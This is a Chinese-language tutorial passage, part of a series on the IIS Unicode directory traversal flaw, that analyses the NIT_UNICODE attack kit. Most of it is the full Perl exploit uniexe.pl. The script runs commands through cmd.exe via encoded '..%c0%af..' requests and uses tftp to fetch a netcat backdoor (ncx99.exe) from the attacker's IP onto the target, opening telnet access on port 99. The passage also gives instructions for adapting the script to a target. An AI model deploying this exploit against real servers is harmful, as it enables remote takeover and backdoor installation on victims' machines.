UNICODE编码漏洞全攻略-5

/ns/ld/win/data/20010426131538.htm

―――――――――――――――――――――――――――――――――
五、网络里可得到的一些UNICODE扫描程序的分析(续)
3、攻击型NIT_UNICODE软件套装
下载地址http://packetstorm.securify.com/0011-exploits/NIT_UNICODE.zip
压缩包里含有以下文件:
uni.pl -------扫描UNICODE编码漏洞的主PERL程序
uniexe.pl -----执行TFTP过程的PERL程序
ncx99.exe -----一个把telnet端口设置在99的netcat木马
tftpd32.exe -----TFTP设置软件
tftpd32.hlp -----帮助文件
flie_id.diz
vendinfo.diz
readme.file -----使用说明和例子
该程序包主要利用unicode编码漏洞,把ncx99.exe上传到目标主机,并启动,使攻击
者可以通过telnet 目标主机的99端口,登陆到目标主机上进行攻击行为。
以下程序在使用时需要修改一些东西,找到
$command="tftp -i xxx.xxx.xxx.xxx GET ncx99.exe c:\\inetpub\\scripts\\nit.exe";
这句,把xxx.xxx.xxx.xxx.xxx修改为你的IP地址,然后存盘。
这句主要是把NCX99.EXE从你的主机改名传到目标主机c:\inetpub\scripts\去。
另外还需要根据目标主机的NT版本,对程序里的..%c0%af..做相应的修改,比如说
目标主机是WIN2K就修改为..%c1%1c..

#!/usr/bin/perl
# This is for educational purpose‘s only!
# WHO LET THEM DOGS OUT!
# Use uni.pl first to see if this is a vulnerable server!
# Based of the script unicodeexecute.pl from Roelof Temmngh
# Files=uniexe.pl,uni.pl,readme.file,tftpd32.exe,exploit.readme

use Socket;

if ($#ARGV<0) {die "Usage: uniexe.pl IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);


$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n\cls");
foreach $line (@results){
if ($line =~ /nit.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {

#You need to change the xxx.xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i xxx.xxx.xxx.xxx GET ncx99.exe c:\\inetpub\\scripts\\nit.exe";
$command=~s/ /\%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line2 (@results2){
if (($line2 =~ /nit.exe/ )) {$failed2=0;}
}
}


$command=@ARGV[1];
print "\n
Hit CTRL-C if this is Hanging";

$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;

# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(‘tcp‘)||2) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can‘t connect...\n"); }

}
# NIT IN THE YEAR 2000